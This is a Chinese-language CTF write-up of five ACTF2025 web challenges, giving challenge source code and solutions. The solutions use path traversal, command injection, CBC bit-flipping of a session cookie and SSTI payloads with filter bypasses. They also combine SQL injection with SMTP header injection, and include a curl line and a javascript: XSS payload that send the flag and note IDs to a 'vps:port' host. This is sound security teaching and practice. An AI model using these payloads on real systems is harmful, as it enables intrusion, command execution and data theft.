ACTF2025 - Web writeup
ACTF upload
进去后是一个登录界面,输入用户名后登录,然后到一个文件上传的界面。
在 /upload?file_path= 处,可以实现任意文件读取,文件内容保存在 img 标签中的 base64 值中。
示例请求:
/upload?file_path=../../../../../../../../etc/passwd
继续读取:
/proc/self/cmdline
得知 app.py 路径,读源码:
import uuid
import os
import hashlib
import base64
from flask import Flask, request, redirect, url_for, flash, session
app = Flask(__name__)
app.secret_key = os.getenv('SECRET_KEY')
@app.route('/')
def index():
if session.get('username'):
return redirect(url_for('upload'))
else:
return redirect(url_for('login'))
@app.route('/login', methods=['POST', 'GET'])
def login():
if request.method == 'POST':
username = request.form['username']
password = request.form['password']
if username == 'admin':
if hashlib.sha256(password.encode()).hexdigest() == '32783cef30bc23d9549623aa48aa8556346d78bd3ca604f277d63d6e573e8ce0': #backdoor
session['username'] = username
return redirect(url_for('index'))
else:
flash('Invalid password')
else:
session['username'] = username
return redirect(url_for('index'))
else:
return '''
<h1>Login</h1>
<h2>No need to register.</h2>
<form action="/login" method="post">
<label for="username">Username:</label>
<input type="text" id="username" name="username" required>
<br>
<label for="password">Password:</label>
<input type="password" id="password" name="password" required>
<br>
<input type="submit" value="Login">
</form>
'''
@app.route('/upload', methods=['POST', 'GET'])
def upload():
if not session.get('username'):
return redirect(url_for('login'))
if request.method == 'POST':
f = request.files['file']
file_path = str(uuid.uuid4()) + '_' + f.filename
f.save('./uploads/' + file_path)
return redirect(f'/upload?file_path={file_path}')
else:
if not request.args.get('file_path'):
return '''
<h1>Upload Image</h1>
<form action="/upload" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload">
</form>
'''
else:
file_path = './uploads/' + request.args.get('file_path')
if session.get('username') != 'admin':
with open(file_path, 'rb') as f:
content = f.read()
b64 = base64.b64encode(content)
return f'<img src="data:image/png;base64,{b64.decode()}" alt="Uploaded Image">'
else:
os.system(f'base64 {file_path} > /tmp/{file_path}.b64')
# with open(f'/tmp/{file_path}.b64', 'r') as f:
# return f'<img src="data:image/png;base64,{f.read()}" alt="Uploaded Image">'
return 'Sorry, but you are not allowed to view this image.'
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
/upload 接口处,如果验证登录名为 admin 就可以进入 os.system 命令执行。
/login 接口处,如果账号为 admin,密码为 backdoor(md5 值为 32783cef30bc23d9549623aa48aa8556346d78bd3ca604f277d63d6e573e8ce0)即可登录 admin 账户。
admin 登录后,访问:
/upload?file_path=`ls / > /tmp/1.txt`
将 ls / 的内容写入 /tmp/1.txt
再访问:
/upload?file_path=../../../../../../../../tmp/1.txt
发现有个 Fl4g_is_H3r3
再访问:
/upload?file_path=../../../../../../../../Fl4g_is_H3r3
把 base64 的值解码即得到 flag
not so web 1
一进去是 Base64 编码的字符串,解密后是源代码。
代码审计发现可以先使用 CBC 翻转攻击 修改用户名,然后利用 SSTI 漏洞。
我们注册账号如下:
- 用户名:
zdmin - 密码:
123456
然后复制 Cookie 并解密:
import base64
import binascii
cookie = "wwMdpFGo0LWQaPsH8s2DiP+tBCDjt/Y/odSHX5NNjaycaLYsPZjrXB+1f6X1R/42nqHM+zh2JW2FuSxy5wGOkZQ57oKGceHy3u9nxPIq7h61Bgdd3zkVBbHZumF+hHGG"
decoded_data = base64.b64decode(cookie)
iv = decoded_data[:16]
encrypted = decoded_data[16:]
print(decoded_data)
print(decoded_data.hex())
print("IV (hex):", iv.hex())
print("Encrypted (hex):", encrypted.hex())
运行脚本得到:
c3031da451a8d0b59068e007f2cd8388ffad0420e3b7f63fa1d4875f934d8dac9c68b62c3d98eb5c1fb57fa5f547fe369ea1ccfb3876256d85b92c72e7018e919439ee828671e1f2deef67c4f22aee1eb506075ddf391505b1d9ba617e847186
IV (hex): c3 03 1d a4 51 a8 d0 b5 90 68 fb 07f2cd8388
Encrypted (hex): ffad0420e3b7f63fa1d4875f934d8dac9c68b62c3d98eb5c1fb57fa5f547fe369ea1ccfb3876256d85b92c72e7018e919439ee828671e1f2deef67c4f22aee1eb506075ddf391505b1d9ba617e847186
根据本地尝试数据:
{"name": "zdmin", "password_raw": "123456", "register_time": 1745636131}
应该在第 11 字节处将 z 改为 a,变为 admin。
执行异或计算:
cipher_11_hex = "fb"
cipher_11_dec = int(cipher_11_hex, 16) # 转为十进制
print(cipher_11_dec)
# 计算异或结果
result_dec = cipher_11_dec ^ ord('z') ^ ord('a')
result_hex = hex(result_dec)
# 输出结果
print(f"cipher[11] (hex): 0x{cipher_11_hex}")
print(f"ord('z'): {ord('z')} (0x{ord('z'):02x})")
print(f"ord('a'): {ord('a')} (0x{ord('a'):02x})")
print(f"Result (decimal): {result_dec}")
print(f"Result (hex): {result_hex}")
print(f"Result as char: {chr(result_dec)}")
重新构造并输出新的 Cookie:
a = "c3031da451a8d0b59068e007f2cd8388ffad0420e3b7f63fa1d4875f934d8dac9c68b62c3d98eb5c1fb57fa5f547fe369ea1ccfb3876256d85b92c72e7018e919439ee828671e1f2deef67c4f22aee1eb506075ddf391505b1d9ba617e847186"
a_bytes = binascii.unhexlify(a) # 转为 bytes
b = base64.b64encode(a_bytes).decode() # Base64 编码并转为字符串
print(b)
对比发现修改了一个字节:
原 Cookie:
wwMdpFGo0LWQaPsH8s2DiP+tBCDjt/Y/odSHX5NNjaycaLYsPZjrXB+1f6X1R/42nqHM+zh2JW2FuSxy5wGOkZQ57oKGceHy3u9nxPIq7h61Bgdd3zkVBbHZumF+hHGG
修改后:
wwMdpFGo0LWQaOAH8s2DiP+tBCDjt/Y/odSHX5NNjaycaLYsPZjrXB+1f6X1R/42nqHM+zh2JW2FuSxy5wGOkZQ57oKGceHy3u9nxPIq7h61Bgdd3zkVBbHZumF+hHGG
之后触发 SSTI 漏洞:
?payload={{url_for.__globals__.os.popen("cat flag.txt").read()}}
以下是你提供内容的纯格式整理版 Markdown,仅调整结构与格式,未增删任何原始信息:
not so web 2
发现 parse_cookie 函数的问题,验签函数核心在于:
PKCS1_v1_5.new(public_key).verify(msg_hash, sig)
但查看文档得知:
也就是说,如果签名有效,方法正常返回;如果签名无效,方法会抛出
ValueError或TypeError异常。
因此,该函数并没有实际的验签逻辑,只是判断签名是否有效。
我们只需要将用户名改为 admin 并保证签名有效即可通过验证,之后仍然可以触发 SSTI 漏洞。
Payload 1:
{{ lipsum["\x5f\x5fglobals\x5f\x5f"].os.popen("ls").read() }}
Payload 2:
{{ lipsum|attr("\u005f\u005fglobals\u005f\u005f")|attr("\u005f\u005fgetitem\u005f\u005f")("os")|attr("popen")("cat flag.txt")|attr("read")() }}
Excellent-Site
题目描述
127.0.0.1 ezmail.org(意思是配置了hosts)
附件如下:
import smtplib
import imaplib
import email
import sqlite3
from urllib.parse import urlparse
import requests
from email.header import decode_header
from flask import *
app = Flask(__name__)
def get_subjects(username, password):
imap_server = "ezmail.org"
imap_port = 143
try:
mail = imaplib.IMAP4(imap_server, imap_port)
mail.login(username, password)
mail.select("inbox")
status, messages = mail.search(None, 'FROM "admin@ezmail.org"')
if status != "OK":
return ""
subject = ""
latest_email = messages[0].split()[-1]
status, msg_data = mail.fetch(latest_email, "(RFC822)")
for response_part in msg_data:
if isinstance(response_part, tuple):
msg = email.message_from_bytes(response_part[1])
subject, encoding = decode_header(msg["Subject"])[0]
if isinstance(subject, bytes):
subject = subject.decode(encoding if encoding else 'utf-8')
mail.logout()
return subject
except:
return "ERROR"
def fetch_page_content(url):
try:
parsed_url = urlparse(url)
if parsed_url.scheme != 'http' or parsed_url.hostname != 'ezmail.org':
return "SSRF Attack!"
response = requests.get(url)
if response.status_code == 200:
return response.text
else:
return "ERROR"
except:
return "ERROR"
@app.route("/report", methods=["GET", "POST"])
def report():
message = ""
if request.method == "POST":
url = request.form["url"]
content = request.form["content"]
smtplib._quote_periods = lambda x: x
mail_content = """From: ignored@ezmail.org\r\nTo: admin@ezmail.org\r\nSubject: {url}\r\n\r\n{content}\r\n.\r\n"""
try:
server = smtplib.SMTP("ezmail.org")
mail_content = smtplib._fix_eols(mail_content)
mail_content = mail_content.format(url=url, content=content)
server.sendmail("ignored@ezmail.org", "admin@ezmail.org", mail_content)
message = "Submitted! Now wait till the end of the world."
except:
message = "Send FAILED"
return render_template("report.html", message=message)
@app.route("/bot", methods=["GET"])
def bot():
requests.get("http://ezmail.org:3000/admin")
return "The admin is checking your advice(maybe)"
@app.route("/admin", methods=["GET"])
def admin():
ip = request.remote_addr
if ip != "127.0.0.1":
return "Forbidden IP"
subject = get_subjects("admin", "p@ssword")
if subject.startswith("http://ezmail.org"):
page_content = fetch_page_content(subject)
return render_template_string(f"""
<h2>Newest Advice(from myself)</h2>
<div>{page_content}</div>
""")
return ""
@app.route("/news", methods=["GET"])
def news():
news_id = request.args.get("id")
if not news_id:
news_id = 1
conn = sqlite3.connect("news.db")
cursor = conn.cursor()
cursor.execute(f"SELECT title FROM news WHERE id = {news_id}")
result = cursor.fetchone()
conn.close()
if not result:
return "Page not found.", 404
return result[0]
@app.route("/")
def index():
return render_template("index.html")
if __name__ == "__main__":
app.run(host="0.0.0.0", port=3000)
/news 这里有 SQL 注入,sqlmap跑了一遍,数据库里没有什么有效信息。
一开始,思路主要集中在绕过waf上,但后来才想出来这里的每一个接口都是有用的:
1、通过/news可以构造返回值为任意字符,进而构造SSTI payload(从而绕过了fetch_page_content函数)
http://ezmail.org:3000/news?id=-1 UNION SELECT '{{lipsum.__globals__.os.popen("cat /flag > app.py").read()}}'
2、将构造好的payload在/report接口出以url参数替换SMTP协议部分的subject部分(payload中还需要用Resent-From头来绕过发件人为admin@ezmail.org这个限制)
3、访问/bot触发SSTI,命令执行
为了正确地处理邮件的收发,我们还需要在本地搭建一个邮件服务器:
# 使用 Docker 快速部署邮件服务器
docker run -d --name ctfmail4 \
-p 25:25 \
-e SMTP_SERVER=ezmail.org \
-e SMTP_USERNAME=admin@ezmail.org \
-e SMTP_PASSWORD='p@ssword' \
-e SERVER_HOSTNAME=mail.ezmail.org \
juanluisbaptiste/postfix:latest
改造后的app.py,便于本地测试
import logging
import smtplib
import imaplib
import email
import sqlite3
from urllib.parse import urlparse
import requests
from email.header import decode_header
from flask import *
app = Flask(__name__)
# app.logger.setLevel(logging.DEBUG)
def get_subjects(username, password):
imap_server = "ezmail.org"
imap_port = 143
try:
mail = imaplib.IMAP4(imap_server, imap_port)
mail.login(username, password)
mail.select("inbox")
status, messages = mail.search(None, 'FROM "admin@ezmail.org"')
if status != "OK":
return ""
subject = ""
latest_email = messages[0].split()[-1]
status, msg_data = mail.fetch(latest_email, "(RFC822)")
for response_part in msg_data:
if isinstance(response_part, tuple):
msg = email.message_from_bytes(response_part [1])
subject, encoding = decode_header(msg["Subject"]) [0]
if isinstance(subject, bytes):
subject = subject.decode(encoding if encoding else 'utf-8')
mail.logout()
return subject
except:
return "ERROR"
#解析url,当url满足 http & hostname=ezmail.org时,访问url,返回网页内容
def fetch_page_content(url):
try:
parsed_url = urlparse(url)
if parsed_url.scheme != 'http' or parsed_url.hostname != 'ezmail.org':
return "SSRF Attack!"
response = requests.get(url)
if response.status_code == 200:
return response.text
else:
return "ERROR"
except:
return "ERROR"
@app.route("/admin", methods=["GET"])
def admin():
print('admin1')
ip = request.remote_addr
if ip != "127.0.0.1":
return "Forbidden IP"
subject = get_subjects("admin", "p@ssword")
if subject.startswith("http://ezmail.org"):
page_content = fetch_page_content(subject)
return render_template_string(f"""
<h2>Newest Advice(from myself)</h2>
<div>{page_content}</div>
""")
return ""
@app.route("/ssti", methods=["GET"])
def admin1():
page_content = request.args.get("c")
return render_template_string(f"""
<h2>Newest Advice(from myself)</h2>
<div>{page_content}</div>
""")
@app.route("/report", methods=["GET", "POST"])
def report():
message = ""
if request.method == "POST":
url = request.form["url"]
content = request.form["content"]
smtplib._quote_periods = lambda x: x
mail_content = """From: ignored@ezmail.org\r\nTo: admin@ezmail.org\r\nSubject: {url}\r\n\r\n{content}\r\n.\r\n"""
try:
server = smtplib.SMTP("localhost", 1026)
mail_content = smtplib._fix_eols(mail_content)
mail_content = mail_content.format(url=url, content=content)
print(f"mail_content is : {mail_content}")
server.sendmail("ignored@ezmail.org", "admin@ezmail.org", mail_content)
return mail_content
message = "Submitted! Now wait till the end of the world."
except:
message = "Send FAILED"
return render_template("report.html", message=message)
@app.route("/bot", methods=["GET"])
def bot():
requests.get("http://ezmail.org:3000/admin")
return "The admin is checking your advice(maybe)"
@app.route("/test", methods=["POST"])
def fetch_page_contentTEST():
url = request.form.get("url", "")
print(f"[DEBUG] 收到的URL: {url}")
try:
parsed_url = urlparse(url)
print(f"[DEBUG] 解析后的URL: {parsed_url}")
print(f"[DEBUG] Scheme: {parsed_url.scheme}")
print(f"[DEBUG] Hostname: {parsed_url.hostname}")
if parsed_url.scheme != 'http' or parsed_url.hostname != 'ezmail.org':
print("[DEBUG] URL检测不通过,返回SSRF Attack!")
return "SSRF Attack!"
print(f"[DEBUG] 发送请求到: {url}")
response = requests.get(url)
print(f"[DEBUG] 返回状态码: {response.status_code}")
if response.status_code == 200:
print("[DEBUG] 成功拿到网页内容")
return response.text
else:
print("[DEBUG] 请求失败,状态码非200")
return "ERROR"
except Exception as e:
print(f"[DEBUG] 出现异常: {e}")
return "ERROR"
#数据库查询
@app.route("/news", methods=["GET"])
def news():
# return '123444'
news_id = request.args.get("id")
if not news_id:
news_id = 1
conn = sqlite3.connect("news.db")
cursor = conn.cursor()
cursor.execute(f"SELECT title FROM news WHERE id = {news_id}")
result = cursor.fetchone()
conn.close()
if not result:
return "Page not found.", 404
return result[0]
@app.route("/")
def index():
return render_template("index.html")
if __name__ == "__main__":
app.run(host="0.0.0.0", port=3000,debug=True)
最后的payload如下:
(注意payload中的端口3000,十分致命)
import time
import requests
url = "题目地址"
# SSTI Payload
payload = "{{lipsum.__globals__.os.popen(\"curl%20http://vps:port/`cat /flag|base64`\").read()}}"
# 邮件头注入
subject = f"http://ezmail.org:3000/news?id=-1 UNION SELECT '{payload}'\r\nFrom: admin@ezmail.org\r\nResent-From: admin@ezmail.org"
data = {"url": subject, "content": ""}
res_1 = requests.post(f"{url}/report", data=data)
res_2 = requests.get(f"{url}/bot")
print('done.')
eznote
js伪协议
app.js
const express = require('express')
const session = require('express-session')
const { randomBytes } = require('crypto')
const fs = require('fs')
const spawn = require('child_process')
const path = require('path')
const { visit } = require('./bot')
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');
const DOMPurify = createDOMPurify(new JSDOM('').window);
const LISTEN_PORT = 3000
const LISTEN_HOST = '0.0.0.0'
const app = express()
app.set('views', './views')
app.set('view engine', 'html')
app.engine('html', require('ejs').renderFile)
app.use(express.urlencoded({ extended: true }))
app.use(session({
secret: randomBytes(4).toString('hex'),
saveUninitialized: true,
resave: true,
}))
app.use((req, res, next) => {
if (!req.session.notes) {
req.session.notes = []
}
next()
})
const notes = new Map()
setInterval(() => { notes.clear() }, 60 * 1000);
function toHtml(source, format){
if (format == undefined) {
format = 'markdown'
}
let tmpfile = path.join('notes', randomBytes(4).toString('hex'))
fs.writeFileSync(tmpfile, source)
let res = spawn.execSync(`pandoc -f ${format} ${tmpfile}`).toString()
// fs.unlinkSync(tmpfile)
return DOMPurify.sanitize(res)
}
app.get('/ping', (req, res) => {
res.send('pong')
})
app.get('/', (req, res) => {
res.render('index', { notes: req.session.notes })
})
app.get('/notes', (req, res) => {
res.send(req.session.notes)
})
app.get('/note/:noteId', (req, res) => {
let { noteId } = req.params
if(!notes.has(noteId)){
res.send('no such note')
return
}
let note = notes.get(noteId)
res.render('note', note)
})
app.post('/note', (req, res) => {
let noteId = randomBytes(8).toString('hex')
let { title, content, format } = req.body
if (!/^[0-9a-zA-Z]{1,10}$/.test(format)) {
res.send("illegal format!!!")
return
}
notes.set(noteId, {
title: title,
content: toHtml(content, format)
})
req.session.notes.push(noteId)
res.send(noteId)
})
app.get('/report', (req, res) => {
res.render('report')
})
app.post('/report', async (req, res) => {
let { url } = req.body
try {
await visit(url)
res.send('success')
} catch (err) {
console.log(err)
res.send('error')
}
})
app.listen(LISTEN_PORT, LISTEN_HOST, () => {
console.log(`listening on ${LISTEN_HOST}:${LISTEN_PORT}`)
})
bot.js
const puppeteer = require('puppeteer')
const process = require('process')
const fs = require('fs')
const FLAG = (() => {
let flag = 'flag{test}'
if (fs.existsSync('flag.txt')){
flag = fs.readFileSync('flag.txt').toString()
fs.unlinkSync('flag.txt')
}
return flag
})()
const HEADLESS = !!(process.env.PROD ?? false)
const sleep = (sec) => new Promise(r => setTimeout(r, sec * 1000))
async function visit(url) {
let browser = await puppeteer.launch({
headless: HEADLESS,
// executablePath: '/usr/bin/chromium',
args: ['--no-sandbox'],
})
let page = await browser.newPage()
await page.goto('http://localhost:3000/')
await page.waitForSelector('#title')
await page.type('#title', 'flag', {delay: 100})
await page.type('#content', FLAG, {delay: 100})
await page.click('#submit', {delay: 100})
await sleep(3)
console.log('visiting %s', url)
await page.goto(url)
await sleep(30)
await browser.close()
}
module.exports = {
visit
}
flag在bot.js的visit函数中作为content的值回显
async function visit(url) {
let browser = await puppeteer.launch({
headless: HEADLESS,
// executablePath: '/usr/bin/chromium',
args: ['--no-sandbox'],
})
let page = await browser.newPage()
await page.goto('http://localhost:3000/')
await page.waitForSelector('#title')
await page.type('#title', 'flag', {delay: 100})
await page.type('#content', FLAG, {delay: 100})
await page.click('#submit', {delay: 100})
await sleep(3)
console.log('visiting %s', url)
await page.goto(url)
await sleep(30)
await browser.close()
}
而app.js中的/report接口调用了visit函数,
app.post('/report', async (req, res) => {
let { url } = req.body
try {
await visit(url)
res.send('success')
} catch (err) {
console.log(err)
res.send('error')
}
})
逻辑:访问/report接口,服务器会先提交一份包含flag的笔记(但笔记对应的noteid未知),然后访问传入的url。
只要获取到对应的noteid,就获取到了flag
可以在 /report 中提交url 参数,利用javascript伪协议,通过 xss 访问/notes接口,获得 bot 的 noteId ,从而获得 flag
payload:
javascript:fetch('/notes').then(r=>r.text()).then(d=>{new Image().src='http://vps:port/?data='+encodeURIComponent(d)})